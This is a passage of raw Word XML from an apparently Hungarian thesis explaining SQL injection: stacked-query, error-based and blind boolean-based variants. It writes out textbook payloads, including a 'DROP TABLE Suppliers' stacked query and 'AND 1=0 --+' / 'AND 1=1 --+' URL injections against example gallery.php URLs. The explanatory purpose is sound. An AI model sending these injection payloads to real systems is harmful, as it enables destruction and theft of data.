          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>UserId</w:t>
      </w:r>
      <w:r w:rsidR="0023483B" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>105;</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>DROP</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>TABLE</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Su</w:t>
      </w:r>
      <w:r w:rsidR="00EA7546" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ppliers</w:t>
      </w:r>
      <w:r w:rsidR="00E00035" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E00035" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="00EE53EA" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00963EDB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> lesz.</w:t>
      </w:r>
      <w:r w:rsidR="00D375A8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ez a támadási forma a pontosvessző </w:t>
      </w:r>
      <w:r w:rsidR="00C96BB9" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL béli </w:t>
      </w:r>
      <w:r w:rsidR="00D375A8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">funkcióját használja </w:t>
      </w:r>
      <w:r w:rsidR="00537BBC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ki</w:t>
      </w:r>
      <w:r w:rsidR="00D375A8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> halmozott lekérdezések indításához. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253BB3B5" w14:textId="3323D2BF" w:rsidR="005905E8" w:rsidRPr="00D47FAE" w:rsidRDefault="005E755F" w:rsidP="00713AFD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">További </w:t>
      </w:r>
      <w:r w:rsidR="00D96E1A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lehetőség</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A20FF6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> amikor </w:t>
      </w:r>
      <w:r w:rsidR="00BC5D18" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a támadó </w:t>
      </w:r>
      <w:r w:rsidR="005905E8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>SQL lekérdezéseken keresztül az adatbázis-kiszolgáló által dobott hibaüzenetekre támaszkodva gyűjt információkat</w:t>
      </w:r>
      <w:r w:rsidR="00A06CFE" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (error-based)</w:t>
      </w:r>
      <w:r w:rsidR="005905E8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ezzel feltérképezve a</w:t>
      </w:r>
      <w:r w:rsidR="006E61D3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">z </w:t>
      </w:r>
      <w:r w:rsidR="00D00781" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">adatbázis </w:t>
      </w:r>
      <w:r w:rsidR="005905E8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>szerkezetét.</w:t>
      </w:r>
      <w:r w:rsidR="00447EB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Például</w:t>
      </w:r>
      <w:r w:rsidR="00BB5306" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00447EB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB5306" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ha a </w:t>
      </w:r>
      <w:r w:rsidR="00447EB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=6'</w:t>
      </w:r>
      <w:r w:rsidR="003515AC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:r w:rsidR="00447EB6" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB5306" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>URL megadása esetén a szerver a hibát SQL szintaxisban adja vissza, akkor</w:t>
      </w:r>
      <w:r w:rsidR="002B3512" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E0D88" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">többlépcsős lekérdezésen keresztül az adatok </w:t>
      </w:r>
      <w:r w:rsidR="007F0C60" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>szintén</w:t>
      </w:r>
      <w:r w:rsidR="006E0D88" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> kinyerhető</w:t>
      </w:r>
      <w:r w:rsidR="000A7A6F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ek.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094FCB0" w14:textId="5A7DF2A2" w:rsidR="006E4AB6" w:rsidRPr="00D47FAE" w:rsidRDefault="006E4AB6" w:rsidP="00713AFD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ez</w:t>
      </w:r>
      <w:r w:rsidR="00CD69B4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ek</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a típus</w:t>
      </w:r>
      <w:r w:rsidR="00CD69B4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tehát azért </w:t>
      </w:r>
      <w:r w:rsidR="00F54220" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sávon belüli</w:t>
      </w:r>
      <w:r w:rsidR="00F24784" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ek</w:t>
      </w:r>
      <w:r w:rsidR="00F54220" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, mert a támadó ugyanazt a kommunikációs csatornát képes használni a támadás elindítására és az eredmények gyűjtésére.</w:t>
      </w:r>
      <w:r w:rsidR="004F28CD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Továbbá</w:t>
      </w:r>
      <w:r w:rsidR="00E313AC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> „klasszikus”, mert </w:t>
      </w:r>
      <w:r w:rsidR="007A2AB1" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a legkedveltebb támadási lehetőséget foglalja magába, eredményeket pedig gyorsan lehet kinyerni általa</w:t>
      </w:r>
      <w:r w:rsidR="00AF25A8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, ellentétben a következő fajtával.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1DE40" w14:textId="77777777" w:rsidR="004F00CF" w:rsidRPr="00D47FAE" w:rsidRDefault="004F00CF" w:rsidP="004F00CF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1847F90C" w14:textId="2849689E" w:rsidR="004F00CF" w:rsidRPr="00D47FAE" w:rsidRDefault="0077574A" w:rsidP="004F00CF">
      <w:pPr>
        <w:pStyle w:val="Stlus3"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc71471965"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>Vak (</w:t>
      </w:r>
      <w:r w:rsidR="00966416" w:rsidRPr="00D47FAE">
        <w:t>blind</w:t>
      </w:r>
      <w:r w:rsidR="006D6C04" w:rsidRPr="00D47FAE">
        <w:t>, inferential</w:t>
      </w:r>
      <w:r w:rsidR="00966416" w:rsidRPr="00D47FAE">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AE4AB8" w:rsidRPr="00D47FAE">
        <w:t xml:space="preserve"> SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1C29F2E4" w14:textId="77777777" w:rsidR="004F00CF" w:rsidRPr="00D47FAE" w:rsidRDefault="004F00CF" w:rsidP="004F00CF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DA26A6" w14:textId="73FD4968" w:rsidR="004F00CF" w:rsidRPr="00D47FAE" w:rsidRDefault="00EB7E85" w:rsidP="00EB7E85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az </w:t>
      </w:r>
      <w:r w:rsidR="00374B2A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>következtetéses</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00374B2A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>befecskendezés</w:t>
      </w:r>
      <w:r w:rsidR="0076004F" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> esetén</w:t>
      </w:r>
      <w:r w:rsidR="00B77ADF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ellentétben a sávon belüli </w:t>
      </w:r>
      <w:r w:rsidR="009B7E2C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>injektálássa</w:t>
      </w:r>
      <w:r w:rsidR="00B77ADF" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">l - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hosszabb ideig tarthat, amíg a támadók kihasználják, ugyanakkor ugyanolyan veszélyes, mint az SQL Injection bármely más formája.</w:t>
      </w:r>
      <w:r w:rsidR="00F76A03" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005045AC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ezen fajta</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> esetén a webalkalmazáson keresztül nem kerülnek át tényleges adatok, és a támadó </w:t>
      </w:r>
      <w:r w:rsidR="005D7A25" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>em láthatja a sávon belüli támadás eredményé</w:t>
      </w:r>
      <w:r w:rsidR="00CD0986" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00DC0E19" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. E</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>helyett a támadó hasznos terhelések küldésével képes rekonstruálni az adatbázis-struktúrát, figyelemmel kísérve a webalkalmazás válaszát és az adatbázis-kiszolgáló ebből fakadó viselkedését.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB64336" w14:textId="7C34FEA8" w:rsidR="00492DF8" w:rsidRPr="00D47FAE" w:rsidRDefault="00A87A32" w:rsidP="00006187">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Mint altípusa, a logikai alapú</w:t>
      </w:r>
      <w:r w:rsidR="007E7BBC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (boolean-based)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00113C73" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">injekció </w:t>
      </w:r>
      <w:r w:rsidR="008418A4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egy </w:t>
      </w:r>
      <w:r w:rsidR="00D04006" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>következtetéses</w:t>
      </w:r>
      <w:r w:rsidR="008418A4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection technika, amely SQL lekérdezés</w:t>
      </w:r>
      <w:r w:rsidR="00D04006" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sel</w:t>
      </w:r>
      <w:r w:rsidR="008418A4" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> arra kényszeríti az alkalmazást, </w:t>
      </w:r>
      <w:r w:rsidR="00492DF8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hogy a lekérdezéstől függően más eredményt adjon vissza.</w:t>
      </w:r>
      <w:r w:rsidR="00674484" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE5431" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az alábbi URL </w:t>
      </w:r>
      <w:r w:rsidR="00CE5431" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
      </w:r>
      <w:r w:rsidR="00F005B3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CE5431" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND </w:t>
      </w:r>
      <w:r w:rsidR="00F005B3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00CE5431" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00F005B3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00CE5431" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> --+</w:t>
      </w:r>
      <w:r w:rsidR="00775843" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [4]</w:t>
      </w:r>
      <w:r w:rsidR="00CE5431" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B166B8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy lekérdezést generál:</w:t>
      </w:r>
      <w:r w:rsidR="00B166B8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT title, description, doby FROM items WHERE id=</w:t>
      </w:r>
      <w:r w:rsidR="000039ED" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B166B8" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>’ AND 1=</w:t>
      </w:r>
      <w:r w:rsidR="00F005B3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00F830F5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F830F5" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidR="00931BCB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002165DD" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Ha az </w:t>
      </w:r>
      <w:r w:rsidR="00EF7912" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">alkalmazás sebezhető SQL </w:t>
      </w:r>
      <w:r w:rsidR="00D14DFC" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00EF7912" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>njekcióval szemben, akkor nem ad vissza semmit</w:t>
      </w:r>
      <w:r w:rsidR="007170AB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, mivel ez egy hamis állítás, 1 nem egyenlő </w:t>
      </w:r>
      <w:r w:rsidR="00F005B3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="007170AB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r w:rsidR="00F005B3" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="007170AB" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>l.</w:t>
      </w:r>
      <w:r w:rsidR="00D7236C" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A57100" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ezek után, ha</w:t>
      </w:r>
      <w:r w:rsidR="00DC4917" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> egy igaz állítást adunk meg: </w:t>
      </w:r>
      <w:r w:rsidR="009355D0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=</w:t>
      </w:r>
      <w:r w:rsidR="00E86B2A" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="009355D0" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>' AND 1=1 --+</w:t>
      </w:r>
